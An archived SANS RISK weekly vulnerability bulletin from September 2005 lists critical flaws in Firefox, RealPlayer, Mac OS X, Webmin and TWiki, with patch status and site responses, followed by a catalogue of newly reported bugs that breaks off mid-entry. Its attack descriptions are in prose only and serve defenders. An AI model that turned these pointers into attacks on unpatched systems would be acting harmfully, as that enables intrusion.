NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > SANS> 2005

RISK: The Consensus Security Vulnerability Alert Vol. 4 No. 39

From: The SANS Institute (ConsensusSecurityVulnerabilityAlertsans.org)
Date: Thu Sep 29 2005 - 19:38:11 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Our survey on the value of RISK had a surprisingly huge response.
Thanks to all of you. The surprising finding was that you valued RISK
most for its notification of critical vulnerabilities in less widely
known tools. You already knew about the Windows vulnerabilities. So
we'll try to highlight the less well known ones to save you time. This
week we found critical vulnerabilities in Firefox, Mozilla, Mac OS
(Apple), RealPlayer, and Twiki.
Alan

*************************************************************************
RISK: The Consensus Security Vulnerability Alert
September 29, 2005 Vol. 4. Week 39
*************************************************************************

RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week
=========================================================================
Platform # of Updates & Vulnerabilities
=========================================================================
Other Microsoft Products 1
Third Party Windows Apps 4
Mac Os 1 (#3)
Linux 3
Unix 1 (#2)
Cross Platform 16 (#1)
Web Application 28 (#4, #5)
______________________________________________________________________

Table of Contents:

Part I -- Critical Vulnerabilities from TippingPoint, a division of 3Com

Widely Deployed Software
(1) HIGH: Mozilla, Firefox, Netscape Browsers Multiple Vulnerabilities
(2) HIGH: RealPlayer and Helix Player Format String Vulnerability
(3) HIGH: Apple Mac OS X Security Update 2005-008
(4) MODERATE: Webmin and Usermin Remote Authentication Bypass

Other Software
(5) HIGH: TWiki INCLUDE Function Remote Command Execution

************** SPONSORED BY SANS Network Security 2005 ******************

Los Angeles, CA October 24-30. Sixteen immersion training tracks and
many special short courses on the hottest technologies (wireless) and
techniques used by attackers. Special programs for auditors and security
managers along with a huge offering for security professionals. Plus a
big exposition and many evening sessions. A great conference.

Information: http://www.sans.org/ns2005/

Why people who care about security attend SANS training:
"This training is like nothing else. No vendor-bias, no marketing
spiel, just detailed theory and practice that will make a real,
immediate difference to my job." Jon King, VANCO

*************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys

-- Other Microsoft Products
05.39.1 - Internet Explorer for Mac OS Denial of Service
-- Third Party Windows Apps
05.39.2 - FL Studio FLP File Processing Heap Overflow
05.39.3 - SecureW2 Insecure Pre-Master Secret Generation Vulnerability
05.39.4 - 7-Zip ARJ File Buffer Overflow
05.39.5 - PowerArchiver Long Filename Buffer Overflow
-- Mac Os
05.39.6 - Apple Mac OS X Security Update 2005-008 Multiple Vulnerabilities
-- Linux
05.39.7 - RealNetworks RealPlayer and Helix Player Format String Vulnerability
05.39.8 - Astaro Security Linux PPTP Server Unspecified Remote Denial of Service
05.39.9 - Zengaia Unspecified SQL Injection
-- Unix
05.39.10 - RSyslog Syslog Message SQL Injection
-- Cross Platform
05.39.11 - TWikiUsers INCLUDE Function Allows Shell Execution
05.39.12 - Polipo Off-By-One Buffer Overflow
05.39.13 - MultiTheftAuto Multiple Remote Vulnerabilities
05.39.14 - wzdftpd SITE Command Arbitrary Command Execution
05.39.15 - phpMyFAQ Logs Unauthorized Access
05.39.16 - JPortal Download.PHP SQL Injection
05.39.17 - Mozilla Browser/Firefox DOM Objects Spoofing Vulnerability
05.39.18 - Mozilla Browser/Firefox XMLHttp Header Spoofing
05.39.19 - Multiple Browser Proxy Auto-Config Script Handling Remote Denial of Service
05.39.20 - Mozilla Browser/ Firefox XBM Image Processing Heap Overflow
05.39.21 - Mozilla Browser/Firefox Unspecified JavaScript Engine Integer Overflow
05.39.22 - Mozilla Browser/Firefox Zero-Width Non-Joiner Stack Corruption
05.39.23 - Mozilla Browser/Firefox Chrome Window Spoofing
05.39.24 - Mozilla Browser/Firefox Chrome Page Loading Restriction Bypass
05.39.25 - Land Down Under Multiple SQL Injection Vulnerabilities
05.39.26 - Yukihiro Matsumoto Ruby SAFE Level Restriction Bypass
-- Web Application
05.39.27 - CJ Web2Mail Multiple Cross-Site Scripting Vulnerabilities
05.39.28 - PostNuke PN_BBCode Local File Include
05.39.29 - CubeCart Multiple Cross-Site Scripting Vulnerabilities
05.39.30 - PHP-Fusion Messages.PHP SQL Injection
05.39.31 - Riverdark RSS Syndicator Module RSS.PHP Multiple Cross-Site Scripting Vulnerabilities
05.39.32 - contentServ Local File Include
05.39.33 - UNU Networks MailGust User_email.PHP SQL Injection
05.39.34 - CMS Made Simple Index.PHP Cross-Site Scripting
05.39.35 - SEO-Board Admin.PHP SQL Injection
05.39.36 - LucidCMS Index.PHP Cross-Site Scripting
05.39.37 - CJ LinkOut Top.PHP Cross-Site Scripting
05.39.38 - CJ Tag Board Multiple Cross-Site Scripting Vulnerabilities
05.39.39 - phpMyFAQ Local File Include Vulnerability
05.39.40 - AlstraSoft E-Friends Remote File Include
05.39.41 - phpMyFAQ Password.PHP SQL Injection
05.39.42 - phpMyFAQ Multiple Cross-Site Scripting Vulnerabilities
05.39.43 - Movable Type Username Information Disclosure
05.39.44 - Mall23 AddItem.ASP SQL Injection
05.39.45 - Lotus Domino Unspecified Cross-Site Scripting
05.39.46 - PunBB Forgotten Email Cross-Site Scripting
05.39.47 - PunBB Language Selection File Include
05.39.48 - GeSHI Example.PHP Directory Traversal
05.39.49 - Copernicus Europa Multiple Unspecified SQL Injection Vulnerabilities
05.39.50 - PerlDiver Perldiver.CGI Cross-Site Scripting
05.39.51 - Simplog Multiple SQL Injection Vulnerabilities
05.39.52 - My Little Forum Search.PHP SQL Injection
05.39.53 - Movable Type Remote File Include
05.39.54 - Movable Type Multiple Unspecified HTML Injection Vulnerabilities

______________________________________________________________________

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar at TippingPoint, a division of
3Com, as a by-product of that company's continuous effort to ensure that
its intrusion prevention products effectively block exploits using known
vulnerabilities. TippingPoint's analysis is complemented by input from
a council of security managers from twelve large organizations who
confidentially share with SANS the specific actions they have taken to
protect their systems. A detailed description of the process may be
found at http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk

***********************
Widely Deployed Software
***********************

(1) HIGH: Mozilla, Firefox, Netscape Browsers Multiple Vulnerabilities
Affected:
Firefox versions 1.0.6 and prior
Mozilla versions 1.7.11 and prior
Netscape version 8.x

Description: Mozilla, Firefox and Netscape browsers contain the
following vulnerabilities that can be exploited by a malicious webpage
to compromise a user's system. (a) The function that processes XBM
(X-Bitmap) images contains a heap-based overflow that can be triggered
by an XBM image ending with a "space" character rather than the end tag.
According to the discoverer, the flaw can be exploited to execute
arbitrary code. (b) Unicode processing of certain sequences leads to a
stack-based overflow that can be exploited to execute arbitrary code.
(c) The JavaScript Engine contains an integer overflow that can be
exploited to execute arbitrary code. (d) The unprivileged "about:" page
can load a privileged "chrome:" page under certain conditions. This flaw
combined with another cross-zone flaw could result in the execution of
arbitrary code. The Mozilla bugzilla contains technical details required
to leverage these flaws.

Status: Mozilla Foundation has released version 1.0.7 for Firefox and
1.7.12 for Mozilla browsers. In addition to the above mentioned high
severity bugs, the newer versions also fix certain spoofing bugs. No
updates are available for Netscape.

Council Site Actions: Most of the council sites responded that they do
not officially support these browsers however they are in use at their
sites. Most of these sites feel their users are clue-full enough to keep
up-to-date with the patches or they have notified the known users. One
of the reporting council sites updated most of their systems earlier
this week and will rely on the remaining systems to be updated by the
users. Another council site has posted the updated versions on its
software mirror.

References:
Mozilla Advisory
http://www.mozilla.org/security/announce/mfsa2005-58.html
SecurityFocus BIDs
http://www.securityfocus.com/bid/14916
http://www.securityfocus.com/bid/14917
http://www.securityfocus.com/bid/14918
http://www.securityfocus.com/bid/14920
http://www.securityfocus.com/bid/14919
http://www.securityfocus.com/bid/14923
http://www.securityfocus.com/bid/14921

****************************************************************

(2) HIGH: RealPlayer and Helix Player Format String Vulnerability
Affected:
Potentially all versions of RealPlayer and Helix Player on UNIX

Description: A zero-day vulnerability has been reported in RealPlayer
and Helix Player, the popular media players on UNIX systems. The players
reportedly contain a format string vulnerability in processing realtext
(".rt") and relapix (".rp") files. The flaw is triggered by providing a
format string to the "image handle" parameter in a ".rp" file. A
malicious realpix or realtxt file in a webpage or an email can exploit
this issue to execute arbitrary code on the client system. If Real
Player or Helix Player is configured as the default media player, no
user interaction is required to leverage the flaw. The discoverer has
posted an exploit that works on Debian Linux.

Status: No patches are available from the vendor at this time. Users
should be advised not to automatically open realpix or realtext files.

Council Site Actions: Most of the council sites do not officially
support this software for their user base; thus, no action was taken.
Several sites will advise their users to patch the systems when a patch
is available. One site has a large user base of these products and
plans to monitor the product site for any upcoming patches. If there is
an exploit released they plan to notify there users not to automatically
invoke these programs from a browser or mail agent. Another site
commented the use of these products is discouraged at their site. They
do plan to notify the users when a patch is available.

References:
Posting by c0ntex
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0675.html
RealPix File Format
http://wdvl.com/Authoring/Languages/XML/SMIL/RealPix/rp.html
RealText File Format
http://service.real.com/help/library/guides/realtext/realtext.htm
SecurityFocus BID
http://www.securityfocus.com/bid/14945

****************************************************************

(3) HIGH: Apple Mac OS X Security Update 2005-008
Affected:
Mac OS X version 10.4.2 Server and Client

Description: Apple has released a security update for Mac OS X client
and server products that fixes buffer overflow, information disclosure,
cross-site scripting and local privilege escalation vulnerabilities. The
important issues fixed by this update are (a) the buffer overflow
vulnerabilities in components that handle GIF and PICT images. The
vulnerable components are also used by Safari. Hence, a malicious
webpage or email may exploit these flaws to compromise a Mac OS X
system. (b) QuickTime Java extensions contain a vulnerability that can
be exploited by a malicious applet to issue arbitrary function calls
from the system libraries. This can lead to a complete compromise of the
client system. The technical details about the flaws have not been
posted yet.

Status: Apply the security patch 2005-008.

Council Site Actions: Only two of the reporting council sites are
responding to this item. One site has scheduled the update push to their
Mac users. The other site said their Mac OS X systems are regularly
patched through the Software Update facility. The remaining sites are
not affected by this problem as they don't have any Mac systems or they
don't officially support them.

References:
Apple Security Advisory
http://docs.info.apple.com/article.html?artnum=302413
SecurityFocus BID
http://www.securityfocus.com/bid/14914

****************************************************************

(4) MODERATE: Webmin and Usermin Remote Authentication Bypass
Affected:
Webmin versions prior to 1.230
Usermin versions prior to 1.160

Description: Webmin provides a web interface to perform administrative
tasks such as configuring users, servers etc. for UNIX-based systems.
Usermin is similar to Webmin, and is available to users to set up their
environment. Webmin as well as Usermin run "miniserv.pl" script that
contains a user-id spoofing vulnerability. The problem arises because
the script does not check for metacharacters like carriage return in the
user-supplied input during the PAM (Pluggable Authentication Modules)
authentication. This flaw can be exploited by an unauthenticated
attacker to execute arbitrary command on the Webmin/Usermin server with
"root" privileges. Successful exploitation, however, requires that "Full
PAM conversations" options be enabled on the "Authentication" page (not
a default setting and according to Webmin advisory the setting is rarely
used). Note that Webmin/Usermin are widely used and have been ported to
most UNIX flavors.

Status: Fixes available. Upgrade to Webmin version 1.230 and Usermin
version 1.160.

Council Site Actions: Only two of the reporting sites are running the
affected software. Both sites are using the auto-update feature from
the Linux vendors and plan to allow updates to occur via that feature.

References:
SNS Advisory
http://archives.neohapsis.com/archives/bugtraq/2005-09/0257.html
Webmin Advisory
http://www.webmin.com/security.html
Webmin/Usermin Introduction
http://www.webmin.com/intro.html
http://www.webmin.com/uintro.html
SecurityFocus BID
http://www.securityfocus.com/bid/14889

****************************************************************

**************
Other Software
*************

(5) HIGH: TWiki INCLUDE Function Remote Command Execution
Affected:
TWikiRelease03Sep2004
TWikiRelease02Sep2004
TWikiRelease01Sep2004
TWikiRelease01Feb2003

Description: TWiki, a popular intranet content management tool, is
reported to contain another remote command execution vulnerability this
week. The problem occurs because the "INCLUDE" function does not check
for shell metacharacters in the "rev" parameter. An attacker may exploit
this flaw to execute arbitrary commands on the TWiki server. The
advisory shows how to craft a malicious HTTP request.

Status: Vendor confirmed, patches available. Note that TWikiRelease
01September2004 patched with Florian Weimer's patch (
http://www.enyo.de/fw/security/notes/twiki-robustness.html) is not
vulnerable.

References:
TWiki Advisory
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithInclude
SecurityFocus BID
http://www.securityfocus.com/bid/14960

*****************************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 39, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4545 unique vulnerabilities. For this special
SANS community listing, Qualys also includes vulnerabilities that cannot
be scanned remotely.

______________________________________________________________________

05.39.1 CVE: Not Available
Platform: Other Microsoft Products
Title: Internet Explorer for Mac OS Denial of Service
Description: Internet Explorer for Mac OS is vulnerable to a denial of
service issue due to kernel exception failure caused by invalid memory
access when opening a malformed Web page. Microsoft Internet Explorer
version 5.2.3 for Mac OS is vulnerable.
Ref: http://www.securityfocus.com/bid/14899
______________________________________________________________________

05.39.2 CVE: Not Available
Platform: Third Party Windows Apps
Title: FL Studio FLP File Processing Heap Overflow
Description: Image-Line Software FL Studio is a commercial audio
editing package. It is vulnerable to a remote heap overflow issue due
to a failure of the application to properly bounds check user-supplied
data prior to copying it to an insufficiently sized memory buffer. An
attacker could exploit this issue to execute arbitrary machine code in
the context of the user running the affected application. FL Studio
version 5.0.1 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/411737
______________________________________________________________________

05.39.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: SecureW2 Insecure Pre-Master Secret Generation Vulnerability
Description: SecureW2 is an EAP-TTLS (Extensible Authentication
Protocol Tunneled Transport Layer Security) client for Microsoft
Windows. It is reported to be vulnerable to an insecure pre-master
secret generation issue. SecureW2 versions 3.1.1 and earlier are
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14947
______________________________________________________________________

05.39.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: 7-Zip ARJ File Buffer Overflow
Description: 7-Zip is a file compression and decompression application
for Microsoft Windows. It is prone to a stack-based buffer overflow
vulnerability when handling ARJ blocks that are greater than 2600
bytes. The vulnerability has been confirmed in versions 3.13, 4.23,
and 4.26 BETA. Other versions may also be affected.
Ref: http://www.securityfocus.com/archive/1/411522
______________________________________________________________________

05.39.5 CVE: Not Available
Platform: Third Party Windows Apps
Title: PowerArchiver Long Filename Buffer Overflow
Description: PowerArchiver is a file compression and decompression
tool. It is reported to be vulnerable to a long filename buffer
overflow issue. PowerArchiver 2006 versions 9.5 Beta 5 and earlier are
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14922
______________________________________________________________________

05.39.6 CVE: CAN-2005-1992, CAN-2005-2747, CAN-2005-2746,
CAN-2005-2745, CAN-2005-2748, CAN-2005-2744, CAN-2005-2743,
CAN-2005-2524, CAN-2005-2742, CAN-2005-2741
Platform: Mac Os
Title: Apple Mac OS X Security Update 2005-008 Multiple
Vulnerabilities
Description: Apple has released Security Update 2005-008 to address
multiple aribitrary code execution, information disclosure, local
privilege escalation, cross-site scripting and unauthorized access
issues. Mac OS X versions 10.4.2 and earlier are reported to be
vulnerable.
Ref: http://www.securityfocus.com/bid/14914
______________________________________________________________________

05.39.7 CVE: Not Available
Platform: Linux
Title: RealNetworks RealPlayer and Helix Player Format String
Vulnerability
Description: RealPlayer and Helix player are susceptible to a format
string vulnerability. This issue is due to a failure of the
application to properly sanitize user-supplied input, allowing a
remote attacker to supply format specifiers directly to a formatted
printing function. RealNetworks RealPlayer version 10.0.5.756 Gold on
Linux is affected.
Ref: http://www.securityfocus.com/bid/14945
______________________________________________________________________

05.39.8 CVE: Not Available
Platform: Linux
Title: Astaro Security Linux PPTP Server Unspecified Remote Denial of
Service
Description: Astaro Security Linux is a network security solution
offering a firewall, VPN, intrusion detection and antivirus
capibilities. Astaro Security Linux Point-to-Point Tunneling Protocol
(PPTP) server is affected by an unspecified remote denial of service
vulnerability. A remote attacker may exploit this issue by sending
specially crafted data to the PPTP server and causing the application
to crash. Version 4.0.27 is vulnerable.
Ref: http://www.securityfocus.com/bid/14950/info
______________________________________________________________________

05.39.9 CVE: Not Available
Platform: Linux
Title: Zengaia Unspecified SQL Injection
Description: Zengaia is a multiplayer game. Zengaia is reportedly
affected by an unspecified SQL injection vulnerability. This is due to
the application failing to properly sanitize user-supplied input
before being used in an SQL query. Zengaia versions prior to 0.2 are
reported to be affected. Zengaia versions 0.2 and 0.2.1 are affected.
Ref: http://www.securityfocus.com/bid/14892
______________________________________________________________________

05.39.10 CVE: CAN-2005-3074
Platform: Unix
Title: RSyslog Syslog Message SQL Injection
Description: RSyslog is a system log management daemon. It is prone to
an SQL injection vulnerability. This vulnerability could permit remote
attackers to pass malicious input to database queries, resulting in
modification of query logic or other attacks. All versions prior to
1.10.1 are vulnerable.
Ref: http://www.rsyslog.com/Article37.phtml
______________________________________________________________________

05.39.11 CVE: CAN-2005-2877
Platform: Cross Platform
Title: TWikiUsers INCLUDE Function Allows Shell Execution
Description: TWiki is a Web-based application that allows creation and
maintenance of Web sites. It is vulnerable to a remote shell execution
due to insufficient sanitization of user-supplied data passed through
the "rev" parameter. TWiki versions 03Sep2004 and earlier are reported
to be vulnerable.
Ref: http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithInclude
______________________________________________________________________

05.39.12 CVE: Not Available
Platform: Cross Platform
Title: Polipo Off-By-One Buffer Overflow
Description: Polipo is a small and fast caching web proxy. It is prone
to an off-by-one buffer overflow vulnerability due to a problem in the
application when parsing NL-terminated headers. Polipo versions 0.9.8
and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/14961
______________________________________________________________________

05.39.13 CVE: Not Available
Platform: Cross Platform
Title: MultiTheftAuto Multiple Remote Vulnerabilities
Description: MultiTheftAuto is a mod and server for Grand Theft Auto
III and Grand Theft Auto: Vice City. It is reported to be vulnerable
to multiple vulnerabilities. MultiTheftAuto versions 0.5 patch 1 and
earlier versions are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14941
______________________________________________________________________

05.39.14 CVE: Not Available
Platform: Cross Platform
Title: wzdftpd SITE Command Arbitrary Command Execution
Description: wzdftpd is an FTP server implementation. It is affected
by a remote arbitrary command execution vulnerability due to
insufficient sanitization of user-supplied data. wzdftpd version 0.5.4
is reported to be vulnerable..
Ref: http://www.securityfocus.com/bid/14935
______________________________________________________________________

05.39.15 CVE: Not Available
Platform: Cross Platform
Title: phpMyFAQ Logs Unauthorized Access
Description: phpMyFAQ is an FAQ manager web-application. It is
vulnerable to unauthorized access due to no authorization when
granting access to the log files. phpMyFAQ version 1.5.1 is
vulnerable.
Ref: http://www.securityfocus.com/bid/14930
______________________________________________________________________

05.39.16 CVE: CAN-2005-3052
Platform: Cross Platform
Title: JPortal Download.PHP SQL Injection
Description: JPortal is a web-based portal application. JPortal is
prone to an SQL injection vulnerability. Successful exploitation could
result in a compromise of the application, disclosure or modification
of data, or may permit an attacker to exploit vulnerabilities in the
underlying database implementation. Versions 2.2.1 through 2.3.1 are
vulnerable.
Ref: http://www.securityfocus.com/archive/1/411518
______________________________________________________________________

05.39.17 CVE: CAN-2005-2704
Platform: Cross Platform
Title: Mozilla Browser/Firefox DOM Objects Spoofing Vulnerability
Description: Mozilla and Firefox are prone to a DOM object spoofing
issue that is exposed through an XBL control that uses <implement> for
an internal interface. A remote attacker could potentially exploit
this issue to gain elevated privileges. Please refer the link below
for a list of vulnerable versions.
Ref: http://www.securityfocus.com/bid/14921/info
______________________________________________________________________

05.39.18 CVE: CAN-2005-2703
Platform: Cross Platform
Title: Mozilla Browser/Firefox XMLHttp Header Spoofing
Description: Mozilla and Firefox browsers are vulnerable to XMLHttp
header spoofing due to insufficient santization of user-supplied input
to the headers of the XMLHttpRequest. Firefox versions 1.0.6, Mozilla
Suite versions 1.7.11 and earlier are reported to be vulnerable.
Ref: http://www.mozilla.org/security/announce/mfsa2005-58.html
______________________________________________________________________

05.39.19 CVE: Not Available
Platform: Cross Platform
Title: Multiple Browser Proxy Auto-Config Script Handling Remote
Denial of Service
Description: Multiple browsers are affected by a remote denial of
service vulnerability due to a design error in the browser processing
a proxy auto-config (PAC) script containing an "eval()" statement.
Firefox versions 1.0.6 and earlier, Netscape Browser versions 8.0.3.3,
and Mozilla versions 1.7.11 and earlier are affected by this issue.
Ref: http://www.securityfocus.com/bid/14924
______________________________________________________________________

05.39.20 CVE: CAN-2005-0215
Platform: Cross Platform
Title: Mozilla Browser/ Firefox XBM Image Processing Heap Overflow
Description: Mozilla and Firefox web browsers are vulnerable to a heap
overflow issue when processing malformed XBM images with a space
character as the terminator. Firefox versions 1.0.6 and Mozilla
versions 1.7.11 and earlier are vulnerable.
Ref: http://www.mozilla.org/security/announce/mfsa2005-58.html
______________________________________________________________________

05.39.21 CVE: CAN-2005-2705
Platform: Cross Platform
Title: Mozilla Browser/Firefox Unspecified JavaScript Engine Integer
Overflow
Description: Mozilla and Firefox are affected by an unspecified
integer overflow vulnerability in their JavaScript engine due to
insufficient boundary checking prior to copying user-supplied data
into sensitive process buffers. Netscape versions 7.2, Netscape
Browser versions 8.0.3.3, Mozilla Firefox versions 1.0.6 and earlier
are affected.
Ref: http://www.securityfocus.com/bid/14917
______________________________________________________________________

05.39.22 CVE: CAN-2005-2702
Platform: Cross Platform
Title: Mozilla Browser/Firefox Zero-Width Non-Joiner Stack Corruption
Description: Mozilla and Firefox are prone to a stack corruption
vulnerability. This issue occurs when Unicode sequences are used with
zero-width non-joiner characters. Successful exploitation could result
in arbitrary code execution in the security context of the user
running the browser.
Ref: http://www.securityfocus.com/bid/14918/references
______________________________________________________________________

05.39.23 CVE: CAN-2005-2707
Platform: Cross Platform
Title: Mozilla Browser/Firefox Chrome Window Spoofing
Description: Mozilla and Firefox browsers are prone to a window
spoofing vulnerability. An error in the creation of windows can be
exploited by opening a window from a reference to a closed window to
create a blank "chrome" canvas. The resulting window is missing
certain security mechanisms designed to protect against phishing
attacks, such as the address bar and the status bar. Mozilla Firefox
versions 1.0.6 and earlier and Mozilla Browser versions 1.7.11 and
earlier are affected.
Ref: http://www.mozilla.org/security/announce/mfsa2005-58.html
______________________________________________________________________

05.39.24 CVE: CAN-2005-2706
Platform: Cross Platform
Title: Mozilla Browser/Firefox Chrome Page Loading Restriction Bypass
Description: Mozilla Browser/Firefox are prone to a potential
arbitrary code execution weakness. This issue allows an attacker to
bypass restrictions associated with loading privileged "chrome" pages.
Ref: http://www.securityfocus.com/bid/14920
______________________________________________________________________

05.39.25 CVE: CAN-2005-2788
Platform: Cross Platform
Title: Land Down Under Multiple SQL Injection Vulnerabilities
Description: Land Down Under is a content management system. It is
affected by multiple SQL injection vulnerabilities due to insufficient
sanitization of user supplied input before including it in SQL
queries. Land Down Under version 801 is vulnerable.
Ref: http://www.securityfocus.com/bid/14896/info
______________________________________________________________________

05.39.26 CVE: CAN-2005-2337
Platform: Cross Platform
Title: Yukihiro Matsumoto Ruby SAFE Level Restriction Bypass
Description: Ruby is an object-oriented scripting language. It is
susceptible to a SAFE level restriction bypass vulnerability due to a
flaw when executing with the SAFE level set to 1, and when objects
that are "tainted" are not allowed to be executed. Ruby versions prior
to 1.8.3 are vulnerable.
Ref: http://www.securityfocus.com/bid/14909
______________________________________________________________________

05.39.27 CVE: CAN-2005-2901
Platform: Web Application
Title: CJ Web2Mail Multiple Cross-Site Scripting Vulnerabilities
Description: CJ Web2Mail is vulnerable to multiple cross-site
scripting issues due to a failure in the application to properly
sanitize user-supplied input to the thankyou.php and web2mail.php
scripts. An attacker may leverage this issue to steal cookie-based
authentication credentials as well as perform other attacks. CJ
Web2Mail 3.0 is vulnerable.
Ref: http://www.securityfocus.com/bid/14956/info
______________________________________________________________________

05.39.28 CVE: Not Available
Platform: Web Application
Title: PostNuke PN_BBCode Local File Include
Description: PostNuke is a content management system written in PHP.
It is reported to be vulnerable to a local file include issue due to
improper sanitization of user-supplied input to the GeSHi library
"pn_bbcode" module of the application. PostNuke version 0.760 is
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14958
______________________________________________________________________

05.39.29 CVE: Not Available
Platform: Web Application
Title: CubeCart Multiple Cross-Site Scripting Vulnerabilities
Description: CubeCart is an eCommerce script written in PHP using a
MySQL database back end. It is prone to multiple cross-site scripting
vulnerabilities. An attacker may leverage any of these issues to have
arbitrary script code executed in the browser of an unsuspecting user
in the context of the affected site.
Ref: http://www.securityfocus.com/bid/14962
______________________________________________________________________

05.39.30 CVE: Not Available
Platform: Web Application
Title: PHP-Fusion Messages.PHP SQL Injection
Description: PHP-Fusion is affected by an SQL injection vulnerability.
Insufficient sanitization of the "msg_send" parameter of the
"messages.php" script exposes this issue. All current versions are
affected.
Ref: http://www.securityfocus.com/bid/14964
______________________________________________________________________

05.39.31 CVE: CAN-2005-3085
Platform: Web Application
Title: Riverdark RSS Syndicator Module RSS.PHP Multiple Cross-Site
Scripting Vulnerabilities
Description: Riverdark RSS Syndicator Module is a newsfeed aggregator
module for Invision Power Board. It is prone to multiple cross-site
scripting vulnerabilities due to insufficient sanitization of
user-supplied input to the "forum" and "topic" parameters of the
"rss.php" script. Riverdark RSS Syndicator module version 2.1.7 is
vulnerable.
Ref: http://securitytracker.com/id?1014969
______________________________________________________________________

05.39.32 CVE: Not Available
Platform: Web Application
Title: contentServ Local File Include
Description: contentServ is web-based content management software
implemented in PHP. It is prone to a local file include vulnerability
due to insufficient sanitization of user-supplied input to the
"ctsWebsite" parameter of the "admin/about.php" script. contentServ
version 3.1 is affected.
Ref: http://www.securityfocus.com/bid/14943
______________________________________________________________________

05.39.33 CVE: Not Available
Platform: Web Application
Title: UNU Networks MailGust User_email.PHP SQL Injection
Description: MailGust is a web-based application that acts as a
mailing list manager, a newsletter distribution tool, and a message
board. It is prone to an SQL injection vulnerability due to improper
sanitization of user-supplied input to the "email" field of the
"/gorum/user_email.php" script. MailGust version 1.9 is reported to be
vulnerable.
Ref: http://www.securityfocus.com/archive/1/411586
______________________________________________________________________

05.39.34 CVE: Not Available
Platform: Web Application
Title: CMS Made Simple Index.PHP Cross-Site Scripting
Description: CMS Made Simple is a content management system written in
PHP. It is prone to a cross-site scripting vulnerability that is
caused by insufficient sanitization of user-supplied input to the
"page" parameter of the "index.php" script. This issue is reported to
affect CMS Made Simple version 0.10; other versions may also be
vulnerable.
Ref: http://www.securityfocus.com/bid/14937
______________________________________________________________________

05.39.35 CVE: Not Available
Platform: Web Application
Title: SEO-Board Admin.PHP SQL Injection
Description: SEO-Board is a forum application. It is vulnerable to an
SQL injection issue due to a failure in the application to properly
sanitize user-supplied cookie data that is processed by the
"admin.php" script. Successful exploitation could result in a
compromise of the application, disclosure or modification of data.
SEO-Board versions earlier than 1.03 are vulnerable.
Ref: http://www.securityfocus.com/bid/14936/info
______________________________________________________________________

05.39.36 CVE: Not Available
Platform: Web Application
Title: LucidCMS Index.PHP Cross-Site Scripting
Description: LucidCMS is a simple and flexible content management
system. It is prone to a cross-site scripting vulnerability due to
insufficient sanitization of user-supplied input to the "index.php"
script. LucidCMS 1.0.11 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14951
______________________________________________________________________

05.39.37 CVE: CAN-2005-2900
Platform: Web Application
Title: CJ LinkOut Top.PHP Cross-Site Scripting
Description: CJ LinkOut is a URL redirection script written in PHP. CJ
LinkOut is prone to a cross-site scripting vulnerability caused by
improper sanitization of user-supplied input to the "123" parameter of
the "top.php" script. CJ LinkOut version 1.0 is affected.
Ref: http://www.securityfocus.com/bid/14953
______________________________________________________________________

05.39.38 CVE: CAN-2005-2899
Platform: Web Application
Title: CJ Tag Board Multiple Cross-Site Scripting Vulnerabilities
Description: CJ Tag Board is prone to multiple cross-site scripting
vulnerabilities. Insufficient sanitization of the date, time, name,
ip, agent and msg parameters exposes the issue. All current versions
are affected.
Ref: http://www.securityfocus.com/bid/14954
______________________________________________________________________

05.39.39 CVE: Not Available
Platform: Web Application
Title: phpMyFAQ Local File Include Vulnerability
Description: phpMyFAQ is an FAQ manager web-application written in
PHP. It is reported to be vulnerable to a local file include issue due
to improper sanitization of "LANGCODE" parameter of the "index.php"
script. phpMyFAQ version 1.5.1 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14929
______________________________________________________________________

05.39.40 CVE: CAN-2005-3062
Platform: Web Application
Title: AlstraSoft E-Friends Remote File Include
Description: AlstraSoft E-Friends is a Web based forum application. It
is affected by a remote file include vulnerability. An attacker could
host arbitrary malicious code in a file at an attacker-controlled site
and include the file using a variable path. An attacker may leverage
this issue to execute arbitrary server-side script code on an affected
computer. AlstraSoft E-Friends 4.0 is reported to be affected.
Ref: http://www.securityfocus.com/archive/1/411584
______________________________________________________________________

05.39.41 CVE: Not Available
Platform: Web Application
Title: phpMyFAQ Password.PHP SQL Injection
Description: phpMyFAQ is an FAQ manager web-application. Insufficient
sanitization of the "username" field of the "password.php" script
exposes the application to an SQL injection issue. phpMyFAQ version
1.5.1 is reported to be prone to this issue.
Ref: http://www.securityfocus.com/bid/14927
______________________________________________________________________

05.39.42 CVE: Not Available
Platform: Web Application
Title: phpMyFAQ Multiple Cross-Site Scripting Vulnerabilities
Description: phpMyFAQ is vulnerable to multiple cross-site scripting
issues due to a failure in the application to properly sanitize
user-supplied input to the
"/admin/header.php" and "/admin/footer.php" scripts. An attacker may
leverage these issues to steal cookie-based authentication credentials
as well as perform other attacks. phpMyFAQ 1.5.1 is vulnerable.
Ref: http://rgod.altervista.org/phpmyfuck151.html
______________________________________________________________________

05.39.43 CVE: Not Available
Platform: Web Application
Title: Movable Type Username Information Disclosure
Description: Movable Type is a Web log publishing platform. It is
